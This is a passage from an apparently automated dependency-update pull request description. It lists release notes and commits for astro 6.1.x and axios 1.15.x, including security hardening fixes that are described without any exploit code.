imports\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eUpdated dependencies [\u003ca href=\"https://github.com/withastro/astro/commit/e0b240edea4db632138def3a9003b4b12e12f765\"\u003e\u003ccode\u003ee0b240e\u003c/code\u003e\u003c/a\u003e]:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003e@​astrojs/telemetry\u003c/code\u003e\u003ca href=\"https://github.com/3\"\u003e\u003ccode\u003e@​3\u003c/code\u003e\u003c/a\u003e.3.1\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eastro@6.1.7\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/withastro/astro/blob/main/packages/astro/CHANGELOG.md\"\u003eastro's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e6.1.10\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/withastro/astro/pull/16479\"\u003e#16479\u003c/a\u003e \u003ca href=\"https://github.com/withastro/astro/commit/1058428df2d13878c6130787636dd1778273a934\"\u003e\u003ccode\u003e1058428\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/matthewp\"\u003e\u003ccode\u003e@​matthewp\u003c/code\u003e\u003c/a\u003e! - Fixes a spurious \u003ccode\u003e[WARN] [content] Content config not loaded\u003c/code\u003e warning during \u003ccode\u003eastro dev\u003c/code\u003e for projects that don't use content collections\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/withastro/astro/pull/16457\"\u003e#16457\u003c/a\u003e \u003ca href=\"https://github.com/withastro/astro/commit/3d82220a1549e699e34ed433f3846a919f4c02bd\"\u003e\u003ccode\u003e3d82220\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/matthewp\"\u003e\u003ccode\u003e@​matthewp\u003c/code\u003e\u003c/a\u003e! - Hardens server island encryption to prevent encrypted data from one island component being replayed against a different one\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/withastro/astro/pull/16481\"\u003e#16481\u003c/a\u003e \u003ca href=\"https://github.com/withastro/astro/commit/152700e08178285b240d8ef947cccd47b870ee5f\"\u003e\u003ccode\u003e152700e\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/matthewp\"\u003e\u003ccode\u003e@​matthewp\u003c/code\u003e\u003c/a\u003e! - Fixes a spurious 404 request for a dev toolbar sourcemap during \u003ccode\u003eastro dev\u003c/code\u003e caused by the browser mis-resolving a relative \u003ccode\u003esourceMappingURL\u003c/code\u003e from the \u003ccode\u003e/@id/\u003c/code\u003e URL prefix\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/withastro/astro/pull/16480\"\u003e#16480\u003c/a\u003e \u003ca href=\"https://github.com/withastro/astro/commit/1bcb43bf04f3fa8f4623897ae2a937250f35216a\"\u003e\u003ccode\u003e1bcb43b\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/matthewp\"\u003e\u003ccode\u003e@​matthewp\u003c/code\u003e\u003c/a\u003e! - Fixes an unnecessary full page reload on first navigation during dev\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e6.1.9\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/withastro/astro/pull/16448\"\u003e#16448\u003c/a\u003e \u003ca href=\"https://github.com/withastro/astro/commit/99464edb5fc0968f6497328e106f26ab393668bd\"\u003e\u003ccode\u003e99464ed\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/matthewp\"\u003e\u003ccode\u003e@​matthewp\u003c/code\u003e\u003c/a\u003e! - Updates vite, picomatch, and unstorage to latest patch versions\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/withastro/astro/pull/16422\"\u003e#16422\u003c/a\u003e \u003ca href=\"https://github.com/withastro/astro/commit/a3951d7873c7c210fedbaa77702bc33db6410715\"\u003e\u003ccode\u003ea3951d7\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/matthewp\"\u003e\u003ccode\u003e@​matthewp\u003c/code\u003e\u003c/a\u003e! - Hardens \u003ccode\u003eastro-island\u003c/code\u003e export resolution and hydration error handling for malformed component metadata\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/withastro/astro/pull/16420\"\u003e#16420\u003c/a\u003e \u003ca href=\"https://github.com/withastro/astro/commit/e21de1d03b318d5045dba718291c04fe05c01490\"\u003e\u003ccode\u003ee21de1d\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/matthewp\"\u003e\u003ccode\u003e@​matthewp\u003c/code\u003e\u003c/a\u003e! - Hardens Astro's error overlay and server logging paths to avoid unsafe HTML insertion and format-string interpolation\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/withastro/astro/pull/16419\"\u003e#16419\u003c/a\u003e \u003ca href=\"https://github.com/withastro/astro/commit/f3485c3458bc8bf70c152126e418c24f489ded9d\"\u003e\u003ccode\u003ef3485c3\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/matthewp\"\u003e\u003ccode\u003e@​matthewp\u003c/code\u003e\u003c/a\u003e! - Hardens nested object and package metadata lookups to ignore prototype keys in content handling and project scaffolding\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/withastro/astro/pull/16022\"\u003e#16022\u003c/a\u003e \u003ca href=\"https://github.com/withastro/astro/commit/a002540d60d4a840db9971e73c820a8015658ffe\"\u003e\u003ccode\u003ea002540\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/mathieumaf\"\u003e\u003ccode\u003e@​mathieumaf\u003c/code\u003e\u003c/a\u003e! - Fixes an issue where i18n domains would return 404 when \u003ccode\u003etrailingSlash\u003c/code\u003e is set to \u003ccode\u003enever\u003c/code\u003e.\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eUpdated dependencies [\u003ca href=\"https://github.com/withastro/astro/commit/99464edb5fc0968f6497328e106f26ab393668bd\"\u003e\u003ccode\u003e99464ed\u003c/code\u003e\u003c/a\u003e, \u003ca href=\"https://github.com/withastro/astro/commit/f3485c3458bc8bf70c152126e418c24f489ded9d\"\u003e\u003ccode\u003ef3485c3\u003c/code\u003e\u003c/a\u003e]:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003e@​astrojs/internal-helpers\u003c/code\u003e\u003ca href=\"https://github.com/0\"\u003e\u003ccode\u003e@​0\u003c/code\u003e\u003c/a\u003e.9.0\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e@​astrojs/markdown-remark\u003c/code\u003e\u003ca href=\"https://github.com/7\"\u003e\u003ccode\u003e@​7\u003c/code\u003e\u003c/a\u003e.1.1\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e6.1.8\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/withastro/astro/pull/16367\"\u003e#16367\u003c/a\u003e \u003ca href=\"https://github.com/withastro/astro/commit/a6866a7ef086627f8f8237274361d8acc2f85121\"\u003e\u003ccode\u003ea6866a7\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/ematipico\"\u003e\u003ccode\u003e@​ematipico\u003c/code\u003e\u003c/a\u003e! - Fixes an issue where build output files could contain special characters (\u003ccode\u003e!\u003c/code\u003e, \u003ccode\u003e~\u003c/code\u003e, \u003ccode\u003e{\u003c/code\u003e, \u003ccode\u003e}\u003c/code\u003e) in their names, causing deploy failures on platforms like Netlify.\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/withastro/astro/pull/16381\"\u003e#16381\u003c/a\u003e \u003ca href=\"https://github.com/withastro/astro/commit/217c5b3b937f0aee7e59280e8a10cf2bd4237605\"\u003e\u003ccode\u003e217c5b3\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/ematipico\"\u003e\u003ccode\u003e@​ematipico\u003c/code\u003e\u003c/a\u003e! - Slightly improved the performance of the dev server by caching the internal crawling of the dependencies of a project.\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/withastro/astro/pull/16348\"\u003e#16348\u003c/a\u003e \u003ca href=\"https://github.com/withastro/astro/commit/7d26cd77bc1b33cee81f0e7b408dc2d170be1bdd\"\u003e\u003ccode\u003e7d26cd7\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/ocavue\"\u003e\u003ccode\u003e@​ocavue\u003c/code\u003e\u003c/a\u003e! - Fixes a bug where emitted assets during a client build would contain always fresh, new hashes in their name. Now the build should be more stable.\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/withastro/astro/pull/16317\"\u003e#16317\u003c/a\u003e \u003ca href=\"https://github.com/withastro/astro/commit/d012bfeadb5b33f9ab1175191d59357d629c327e\"\u003e\u003ccode\u003ed012bfe\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/das-peter\"\u003e\u003ccode\u003e@​das-peter\u003c/code\u003e\u003c/a\u003e! - Fixes a bug where \u003ccode\u003eallowedDomains\u003c/code\u003e weren't correctly propagated when using the development server.\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/withastro/astro/pull/16379\"\u003e#16379\u003c/a\u003e \u003ca href=\"https://github.com/withastro/astro/commit/5a845514114ae21ca9820e98b56cce33c0cf579b\"\u003e\u003ccode\u003e5a84551\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/martrapp\"\u003e\u003ccode\u003e@​martrapp\u003c/code\u003e\u003c/a\u003e! - Improves Vue scoped style handling in DEV mode during client router navigation.\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/withastro/astro/pull/16317\"\u003e#16317\u003c/a\u003e \u003ca href=\"https://github.com/withastro/astro/commit/d012bfeadb5b33f9ab1175191d59357d629c327e\"\u003e\u003ccode\u003ed012bfe\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/das-peter\"\u003e\u003ccode\u003e@​das-peter\u003c/code\u003e\u003c/a\u003e! - Adds tests to verify settings are properly propagated when using the development server.\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/withastro/astro/pull/16282\"\u003e#16282\u003c/a\u003e \u003ca href=\"https://github.com/withastro/astro/commit/5b0fdaa8ba3dc17f4b93d9847c3255150b0aeab2\"\u003e\u003ccode\u003e5b0fdaa\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/jmurty\"\u003e\u003ccode\u003e@​jmurty\u003c/code\u003e\u003c/a\u003e! - Fixes build errors on platforms with skew protection enabled (e.g. Vercel, Netlify) for inter-chunk Javascript using dynamic imports\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eUpdated dependencies [\u003ca href=\"https://github.com/withastro/astro/commit/e0b240edea4db632138def3a9003b4b12e12f765\"\u003e\u003ccode\u003ee0b240e\u003c/code\u003e\u003c/a\u003e]:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003e@​astrojs/telemetry\u003c/code\u003e\u003ca href=\"https://github.com/3\"\u003e\u003ccode\u003e@​3\u003c/code\u003e\u003c/a\u003e.3.1\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/withastro/astro/commit/c1f2e4f62adc1f2ba7b36f400f38fbab8862bc74\"\u003e\u003ccode\u003ec1f2e4f\u003c/code\u003e\u003c/a\u003e [ci] release (\u003ca href=\"https://github.com/withastro/astro/tree/HEAD/packages/astro/issues/16467\"\u003e#16467\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/withastro/astro/commit/345fb9e370ddcd633c1043326e723ee43c89a3e4\"\u003e\u003ccode\u003e345fb9e\u003c/code\u003e\u003c/a\u003e chore: fix flaky dev toolbar render time test (\u003ca href=\"https://github.com/withastro/astro/tree/HEAD/packages/astro/issues/16500\"\u003e#16500\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/withastro/astro/commit/5120ecd4c337a7c59c4956ff8fd6bf327b4abce9\"\u003e\u003ccode\u003e5120ecd\u003c/code\u003e\u003c/a\u003e [ci] format\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/withastro/astro/commit/3d82220a1549e699e34ed433f3846a919f4c02bd\"\u003e\u003ccode\u003e3d82220\u003c/code\u003e\u003c/a\u003e Add AEAD context binding to server island encryption (\u003ca href=\"https://github.com/withastro/astro/tree/HEAD/packages/astro/issues/16457\"\u003e#16457\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/withastro/astro/commit/1bcb43bf04f3fa8f4623897ae2a937250f35216a\"\u003e\u003ccode\u003e1bcb43b\u003c/code\u003e\u003c/a\u003e Prebundle dev toolbar entrypoint in client environment (\u003ca href=\"https://github.com/withastro/astro/tree/HEAD/packages/astro/issues/16480\"\u003e#16480\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/withastro/astro/commit/93101cce781585574d6b528bae05d5b6a02e63bd\"\u003e\u003ccode\u003e93101cc\u003c/code\u003e\u003c/a\u003e [ci] format\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/withastro/astro/commit/152700e08178285b240d8ef947cccd47b870ee5f\"\u003e\u003ccode\u003e152700e\u003c/code\u003e\u003c/a\u003e fix: strip sourceMappingURL from dev toolbar entrypoint during dep optimizati...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/withastro/astro/commit/bc8304121b79f5fdcfb400d6baea977840391134\"\u003e\u003ccode\u003ebc83041\u003c/code\u003e\u003c/a\u003e refactor(astro): migrate test utils to typescript (\u003ca href=\"https://github.com/withastro/astro/tree/HEAD/packages/astro/issues/16492\"\u003e#16492\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/withastro/astro/commit/5c543c595def9826acdd71c1cb88f08f8d63f1a5\"\u003e\u003ccode\u003e5c543c5\u003c/code\u003e\u003c/a\u003e refactor(astro): add internal entry points for test (\u003ca href=\"https://github.com/withastro/astro/tree/HEAD/packages/astro/issues/16473\"\u003e#16473\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/withastro/astro/commit/1058428df2d13878c6130787636dd1778273a934\"\u003e\u003ccode\u003e1058428\u003c/code\u003e\u003c/a\u003e Suppress content config warning for projects without content collections (\u003ca href=\"https://github.com/withastro/astro/tree/HEAD/packages/astro/issues/16\"\u003e#16\u003c/a\u003e...\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/withastro/astro/commits/astro@6.1.10/packages/astro\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `axios` from 1.13.5 to 1.15.2\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/axios/axios/releases\"\u003eaxios's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev1.15.2\u003c/h2\u003e\n\u003cp\u003eThis release delivers prototype-pollution hardening for the Node HTTP adapter, adds an opt-in \u003ccode\u003eallowedSocketPaths\u003c/code\u003e allowlist to mitigate SSRF via Unix domain sockets, fixes a keep-alive socket memory leak, and ships supply-chain hardening across CI and security docs.\u003c/p\u003e\n\u003ch2\u003e🔒 Security Fixes\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003ePrototype Pollution Hardening (HTTP Adapter):\u003c/strong\u003e Hardened the Node HTTP adapter and \u003ccode\u003eresolveConfig\u003c/code\u003e/\u003ccode\u003emergeConfig\u003c/code\u003e/validator paths to read only own properties and use null-prototype config objects, preventing polluted \u003ccode\u003eauth\u003c/code\u003e, \u003ccode\u003ebaseURL\u003c/code\u003e, \u003ccode\u003esocketPath\u003c/code\u003e, \u003ccode\u003ebeforeRedirect\u003c/code\u003e, and \u003ccode\u003einsecureHTTPParser\u003c/code\u003e from influencing requests. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10779\"\u003e#10779\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eSSRF via \u003ccode\u003esocketPath\u003c/code\u003e:\u003c/strong\u003e Rejects non-string \u003ccode\u003esocketPath\u003c/code\u003e values and adds an opt-in \u003ccode\u003eallowedSocketPaths\u003c/code\u003e config option to restrict permitted Unix domain socket paths, returning \u003ccode\u003eAxiosError\u003c/code\u003e \u003ccode\u003eERR_BAD_OPTION_VALUE\u003c/code\u003e on mismatch. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10777\"\u003e#10777\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eSupply-chain Hardening:\u003c/strong\u003e Added \u003ccode\u003e.npmrc\u003c/code\u003e with \u003ccode\u003eignore-scripts=true\u003c/code\u003e, lockfile lint CI, non-blocking reproducible build diff, scoped CODEOWNERS, expanded \u003ccode\u003eSECURITY.md\u003c/code\u003e/\u003ccode\u003eTHREATMODEL.md\u003c/code\u003e with provenance verification (\u003ccode\u003enpm audit signatures\u003c/code\u003e), 60-day resolution policy, and maintainer incident-response runbook. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10776\"\u003e#10776\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e🚀 New Features\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003e\u003ccode\u003eallowedSocketPaths\u003c/code\u003e Config Option:\u003c/strong\u003e New request config option (and TypeScript types) to allowlist Unix domain socket paths used by the Node http adapter; backwards compatible when unset. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10777\"\u003e#10777\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e🐛 Bug Fixes\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eKeep-alive Socket Memory Leak:\u003c/strong\u003e Installs a single per-socket \u003ccode\u003eerror\u003c/code\u003e listener tracking the active request via \u003ccode\u003ekAxiosSocketListener\u003c/code\u003e/\u003ccode\u003ekAxiosCurrentReq\u003c/code\u003e, eliminating per-request listener accumulation, \u003ccode\u003eMaxListenersExceededWarning\u003c/code\u003e, and linear heap growth under concurrent or long-running keep-alive workloads (fixes \u003ca href=\"https://redirect.github.com/axios/axios/issues/10780\"\u003e#10780\u003c/a\u003e). (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10788\"\u003e#10788\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e🔧 Maintenance \u0026amp; Chores\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eChangelog:\u003c/strong\u003e Updated \u003ccode\u003eCHANGELOG.md\u003c/code\u003e with v1.15.1 release notes. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10781\"\u003e#10781\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/axios/axios/compare/v1.15.1...v1.15.2\"\u003eFull Changelog\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev1.15.1\u003c/h2\u003e\n\u003cp\u003eThis release ships a coordinated set of security hardening fixes across headers, body/redirect limits, multipart handling, and XSRF/prototype-pollution vectors, alongside a broad sweep of bug fixes, test migrations, and threat-model documentation updates.\u003c/p\u003e\n\u003ch2\u003e🔒 Security Fixes\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eHeader Injection Hardening:\u003c/strong\u003e Tightened validation and sanitisation across request header construction to close the header-injection attack surface. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10749\"\u003e#10749\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eCRLF Stripping in Multipart Headers:\u003c/strong\u003e Correctly strips CR/LF from multipart header values to prevent injection via field names and filenames. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10758\"\u003e#10758\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003ePrototype Pollution / Auth Bypass:\u003c/strong\u003e Replaced unsafe \u003ccode\u003ein\u003c/code\u003e checks with \u003ccode\u003ehasOwnProperty\u003c/code\u003e to prevent authentication bypass via prototype pollution on config objects, with additional regression tests. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10761\"\u003e#10761\u003c/a\u003e\u003c/strong\u003e, \u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10760\"\u003e#10760\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003e\u003ccode\u003ewithXSRFToken\u003c/code\u003e Truthy Bypass:\u003c/strong\u003e Short-circuits on any truthy non-boolean value, so an ambiguous config no longer silently leaks the XSRF token cross-origin. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10762\"\u003e#10762\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003e\u003ccode\u003emaxBodyLength\u003c/code\u003e With Zero Redirects:\u003c/strong\u003e Enforces \u003ccode\u003emaxBodyLength\u003c/code\u003e even when \u003ccode\u003emaxRedirects\u003c/code\u003e is set to \u003ccode\u003e0\u003c/code\u003e, closing a bypass path for oversized request bodies. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10753\"\u003e#10753\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eStreamed Response \u003ccode\u003emaxContentLength\u003c/code\u003e Bypass:\u003c/strong\u003e Applies \u003ccode\u003emaxContentLength\u003c/code\u003e to streamed responses that previously bypassed the cap. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10754\"\u003e#10754\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eFollow-up CVE Completion:\u003c/strong\u003e Completes an earlier incomplete CVE fix to fully close the regression window. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10755\"\u003e#10755\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e🚀 New Features\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eAI-Based Docs Translations:\u003c/strong\u003e Initial scaffold for AI-assisted translations of the documentation site. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10705\"\u003e#10705\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003e\u003ccode\u003eLocation\u003c/code\u003e Request Header Type:\u003c/strong\u003e Adds \u003ccode\u003eLocation\u003c/code\u003e to \u003ccode\u003eCommonRequestHeadersList\u003c/code\u003e for accurate typing of redirect-aware requests. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/7528\"\u003e#7528\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e🐛 Bug Fixes\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eFormData Handling:\u003c/strong\u003e Removes \u003ccode\u003eContent-Type\u003c/code\u003e when no boundary is present on \u003ccode\u003eFormData\u003c/code\u003e fetch requests, supports multi-select fields, cancels \u003ccode\u003erequest.body\u003c/code\u003e instead of the source stream on fetch abort, and fixes a recursion bug in form-data serialisation. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/7314\"\u003e#7314\u003c/a\u003e\u003c/strong\u003e, \u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10676\"\u003e#10676\u003c/a\u003e\u003c/strong\u003e, \u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10702\"\u003e#10702\u003c/a\u003e\u003c/strong\u003e, \u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10726\"\u003e#10726\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eHTTP Adapter:\u003c/strong\u003e Handles socket-only request errors without leaking keep-alive listeners. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10576\"\u003e#10576\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eProgress Events:\u003c/strong\u003e Clamps \u003ccode\u003eloaded\u003c/code\u003e to \u003ccode\u003etotal\u003c/code\u003e for computable upload/download progress events. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/7458\"\u003e#7458\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eTypes:\u003c/strong\u003e Aligns \u003ccode\u003erunWhen\u003c/code\u003e type with the runtime behaviour in \u003ccode\u003eInterceptorManager\u003c/code\u003e and makes response header keys case-insensitive. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/7529\"\u003e#7529\u003c/a\u003e\u003c/strong\u003e, \u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10677\"\u003e#10677\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003e\u003ccode\u003ebuildFullPath\u003c/code\u003e:\u003c/strong\u003e Uses strict equality in the base/relative URL check. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/7252\"\u003e#7252\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003e\u003ccode\u003eAxiosURLSearchParams\u003c/code\u003e Regex:\u003c/strong\u003e Improves the regex used for param serialisation to avoid edge-case mismatches. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10736\"\u003e#10736\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eResilient Value Parsing:\u003c/strong\u003e Parses out header/config values instead of throwing on malformed input. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10687\"\u003e#10687\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/axios/axios/blob/v1.x/CHANGELOG.md\"\u003eaxios's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev1.15.2 - April 21, 2026\u003c/h2\u003e\n\u003cp\u003eThis release delivers prototype-pollution hardening for the Node HTTP adapter, adds an opt-in \u003ccode\u003eallowedSocketPaths\u003c/code\u003e allowlist to mitigate SSRF via Unix domain sockets, fixes a keep-alive socket memory leak, and ships supply-chain hardening across CI and security docs.\u003c/p\u003e\n\u003ch2\u003e🔒 Security Fixes\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003ePrototype Pollution Hardening (HTTP Adapter):\u003c/strong\u003e Hardened the Node 